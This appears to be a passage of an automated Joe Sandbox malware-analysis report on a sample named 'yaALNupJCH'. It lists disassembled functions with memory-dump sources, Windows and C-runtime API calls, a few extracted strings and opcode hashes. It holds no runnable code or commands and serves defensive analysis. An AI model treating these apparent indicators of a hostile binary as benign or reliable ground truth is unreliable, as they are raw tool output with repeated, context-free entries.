                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b83538014b011fe5aadaf25438fe6a05ee24b20f279c4ff36abc7e32ec3dcc3d
                                                                                                • Instruction ID: fe18d335e62670bc5314f7c1232e7cbb3f840594d96164c9f94480533082bfd2
                                                                                                • Opcode Fuzzy Hash: b83538014b011fe5aadaf25438fe6a05ee24b20f279c4ff36abc7e32ec3dcc3d
                                                                                                • Instruction Fuzzy Hash: B5F12E71E012199BDF14CF6DD8807AEB7B1FF88314F25816AE925AB345D731AE41CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CD5508,?,?,00000008,?,?,00CD51A0,00000000), ref: 00CD573A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID:
                                                                                                • API String ID: 3997070919-0
                                                                                                • Opcode ID: 0223413eacf277016541d155bd1750696c340df64684092c1a09f5ac21af4258
                                                                                                • Instruction ID: dae1e3f521a44d9c78a92cca5785c67ed4422e09431282ca9cc27b50243df7e5
                                                                                                • Opcode Fuzzy Hash: 0223413eacf277016541d155bd1750696c340df64684092c1a09f5ac21af4258
                                                                                                • Instruction Fuzzy Hash: BCB15B35620A05CFD715CF28C486B657BE1FF45364F298659E9AACF3A1C335EA82CB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CC2D03
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FeaturePresentProcessor
                                                                                                • String ID:
                                                                                                • API String ID: 2325560087-0
                                                                                                • Opcode ID: d487cca29d61ac2eb9f2e5b59c7b335ebc5227e2c4288919067464ab2993471a
                                                                                                • Instruction ID: 18e3551dc2571d0acb55df534455a64bb88b43957df969e4b0319adb9f6ece3c
                                                                                                • Opcode Fuzzy Hash: d487cca29d61ac2eb9f2e5b59c7b335ebc5227e2c4288919067464ab2993471a
                                                                                                • Instruction Fuzzy Hash: D6515DB1A01255CBDB19CF55D9D5BAEBBF4FB48310F24846ED415EB290D3789A80CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 098944d39e6b7736bd5e75ac45832909f756cb7b0027568c352c9a95ba9fe1e0
                                                                                                • Instruction ID: e56035593712f978180eb45dbf74208b93b6d40bef56094dafb7c055ec8e5f3f
                                                                                                • Opcode Fuzzy Hash: 098944d39e6b7736bd5e75ac45832909f756cb7b0027568c352c9a95ba9fe1e0
                                                                                                • Instruction Fuzzy Hash: BE41AFB5804218AFDB20DFA9CC9AFAABBB9AF45300F1442DDE41D93211DA359E849F10
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0
                                                                                                • API String ID: 0-4108050209
                                                                                                • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                                                • Instruction ID: 78bdd8c83a0964a0bf1cecee5d1f36153d5bbee420971261c8a1c4edd491a3f3
                                                                                                • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                                                • Instruction Fuzzy Hash: 48518C70604B885ADF38CA28CB96FBE77999F42304F1C041DE493DB2A2C621EF49D346
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: HeapProcess
                                                                                                • String ID:
                                                                                                • API String ID: 54951025-0
                                                                                                • Opcode ID: 9182e84277cc25938829574bf08dc9493ded3762a1032566987c9203b8a047d5
                                                                                                • Instruction ID: 2ab4dc618a124e142d2d4e540d4d01de04fdb8ad8447f9066584a0e84b814c53
                                                                                                • Opcode Fuzzy Hash: 9182e84277cc25938829574bf08dc9493ded3762a1032566987c9203b8a047d5
                                                                                                • Instruction Fuzzy Hash: 19A00270603681DF97508F35AF8970D3BEAAA456D5709506AE40FCE170EB749498AB06
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d2a7d0cc657c6f28aec2f59178bfe91bdefae6b4fc630ce65176fd2ba6bb212a
                                                                                                • Instruction ID: f1637df12dfd0141e1ea50f15d223914c6c4ce8560207e9a916d7626c89b68a9
                                                                                                • Opcode Fuzzy Hash: d2a7d0cc657c6f28aec2f59178bfe91bdefae6b4fc630ce65176fd2ba6bb212a
                                                                                                • Instruction Fuzzy Hash: D0629CA640E3C19FD753CB75889A6D03F72DE2722678E85D9C0C04F177E269284BDB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f243a1e8f58e3a86e7996e67f8460b10fc5156dfe7aacf3a31ba1c29e2aeb4fd
                                                                                                • Instruction ID: 643a2f2803967973e29966c0cbf489e83cec042ccee24dc7d19b0425fabaf85d
                                                                                                • Opcode Fuzzy Hash: f243a1e8f58e3a86e7996e67f8460b10fc5156dfe7aacf3a31ba1c29e2aeb4fd
                                                                                                • Instruction Fuzzy Hash: 5321B673F2043947770CC47E8C5327DB6E1C78C501745423AE9A6EA2C1D968D917E2E4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cbbb9c7cd83d42d9065666c8f7eef90f50d4c3287b0518a19360f3f35fbacf57
                                                                                                • Instruction ID: 95e76b8cbbb5c4a6129eee236b7cdba79425d2d8156031a60347fd35d049e991
                                                                                                • Opcode Fuzzy Hash: cbbb9c7cd83d42d9065666c8f7eef90f50d4c3287b0518a19360f3f35fbacf57
                                                                                                • Instruction Fuzzy Hash: 1B117723F30C255B675C816D8C1727E95D6EBD825070F533AD926E7384E9A4DE13D290
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction ID: c5baeed4a2acfa2d8ba0da9f0a97ca74cb30df3ac370b7363449abfd437f1b2f
                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction Fuzzy Hash: D81108B724008283DA14CA6DE4B85B7A795EAC532072C437BD3624B75CF522EBC5DA00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e0ad719187851a61f309ddbb2cee80a5110ae42387cecf94a10a94091515ac20
                                                                                                • Instruction ID: cdfb019d054521f8179317f4a0b614c163848553e98d596f05237332577daff5
                                                                                                • Opcode Fuzzy Hash: e0ad719187851a61f309ddbb2cee80a5110ae42387cecf94a10a94091515ac20
                                                                                                • Instruction Fuzzy Hash: BFE04632911228EBCB14DB88C948E8AB6ACEB48B40B11009AF501D3140C670DE04DBD0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • ___free_lconv_mon.LIBCMT ref: 00CCD638
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD1EE
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD200
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD212
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD224
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD236
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD248
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD25A
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD26C
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD27E
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD290
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD2A2
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD2B4
                                                                                                  • Part of subcall function 00CCD1D1: _free.LIBCMT ref: 00CCD2C6
                                                                                                • _free.LIBCMT ref: 00CCD62D
                                                                                                  • Part of subcall function 00CC8951: HeapFree.KERNEL32(00000000,00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000), ref: 00CC8967
                                                                                                  • Part of subcall function 00CC8951: GetLastError.KERNEL32(00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000,00000000), ref: 00CC8979
                                                                                                • _free.LIBCMT ref: 00CCD64F
                                                                                                • _free.LIBCMT ref: 00CCD664
                                                                                                • _free.LIBCMT ref: 00CCD66F
                                                                                                • _free.LIBCMT ref: 00CCD691
                                                                                                • _free.LIBCMT ref: 00CCD6A4
                                                                                                • _free.LIBCMT ref: 00CCD6B2
                                                                                                • _free.LIBCMT ref: 00CCD6BD
                                                                                                • _free.LIBCMT ref: 00CCD6F5
                                                                                                • _free.LIBCMT ref: 00CCD6FC
                                                                                                • _free.LIBCMT ref: 00CCD719
                                                                                                • _free.LIBCMT ref: 00CCD731
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                • String ID:
                                                                                                • API String ID: 161543041-0
                                                                                                • Opcode ID: ca57dca3ccc914802e197b4cd5d1de37aa852066490173822512b56a90306b71
                                                                                                • Instruction ID: ef8e33214b20f5c50c407ec465469dcd56e5f12e4de300c2e5897a8a8fa355f1
                                                                                                • Opcode Fuzzy Hash: ca57dca3ccc914802e197b4cd5d1de37aa852066490173822512b56a90306b71
                                                                                                • Instruction Fuzzy Hash: 8B316C716047059FEB21AA79D885F6B73E8AF40350F10492DF06AD7191DF30EE85DB21
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00CC9140
                                                                                                  • Part of subcall function 00CC8951: HeapFree.KERNEL32(00000000,00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000), ref: 00CC8967
                                                                                                  • Part of subcall function 00CC8951: GetLastError.KERNEL32(00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000,00000000), ref: 00CC8979
                                                                                                • _free.LIBCMT ref: 00CC914C
                                                                                                • _free.LIBCMT ref: 00CC9157
                                                                                                • _free.LIBCMT ref: 00CC9162
                                                                                                • _free.LIBCMT ref: 00CC916D
                                                                                                • _free.LIBCMT ref: 00CC9178
                                                                                                • _free.LIBCMT ref: 00CC9183
                                                                                                • _free.LIBCMT ref: 00CC918E
                                                                                                • _free.LIBCMT ref: 00CC9199
                                                                                                • _free.LIBCMT ref: 00CC91A7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: ae0c780183c660eaa10507fa10f7d26bf089c8d524370acae32e51d1f63da80b
                                                                                                • Instruction ID: 1595a64828e0de5bea215e236ccc12a1f524a7be4050d2f9327b5a4038e3a527
                                                                                                • Opcode Fuzzy Hash: ae0c780183c660eaa10507fa10f7d26bf089c8d524370acae32e51d1f63da80b
                                                                                                • Instruction Fuzzy Hash: D321FC76904109BFCB01EF94C895EDE7BB9FF08340F00466AF9199B161DB31DA48DB81
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b6630607049b4f06379e6b900fd26ef143ddee83e0cb9ac45d9046c711fb923c
                                                                                                • Instruction ID: 68c5a07d159de0082b44928ad34cdc6002ce69b499563f06be8c90fc61f22854
                                                                                                • Opcode Fuzzy Hash: b6630607049b4f06379e6b900fd26ef143ddee83e0cb9ac45d9046c711fb923c
                                                                                                • Instruction Fuzzy Hash: 64C1F771E04285EFDB15DF99C881BAD7BB0BF49310F04419AE6519B393C774AB42CB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 00CBD276
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00CBD6F9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: PathTempXinvalid_argumentstd::_
                                                                                                • String ID: 853321935212$OJq=$Otu=$invalid stoi argument$stoi argument out of range
                                                                                                • API String ID: 3948722134-1220461047
                                                                                                • Opcode ID: b4a864fb2e2644bbb5c6f738609d197266c3de72187d479d8cb20bfe950a38ff
                                                                                                • Instruction ID: 594c6ef5d334150bcb3d83ecc074882896602587aec63805f1cb7af14f8510d4
                                                                                                • Opcode Fuzzy Hash: b4a864fb2e2644bbb5c6f738609d197266c3de72187d479d8cb20bfe950a38ff
                                                                                                • Instruction Fuzzy Hash: 2AE115716001485BDF18EF38CD8ABED7B3AAF42344F544618F806876D7EB39DA858792
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00CC3367
                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00CC336F
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00CC33F8
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00CC3423
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00CC3478
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                • String ID: csm$csm
                                                                                                • API String ID: 1170836740-3733052814
                                                                                                • Opcode ID: fa710ef71abef0066bd26fa32c67b4dfd703fc7cc8c24e1577f679c90c4667ae
                                                                                                • Instruction ID: ce5406160797f03ee20ce6f82a2f5e531afcae38da948a174b94df401bd5c7ef
                                                                                                • Opcode Fuzzy Hash: fa710ef71abef0066bd26fa32c67b4dfd703fc7cc8c24e1577f679c90c4667ae
                                                                                                • Instruction Fuzzy Hash: F151A134A002849FCF15DF29E845FAEBBA5AF44314F14C19DE8159B3A2C772DB02CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
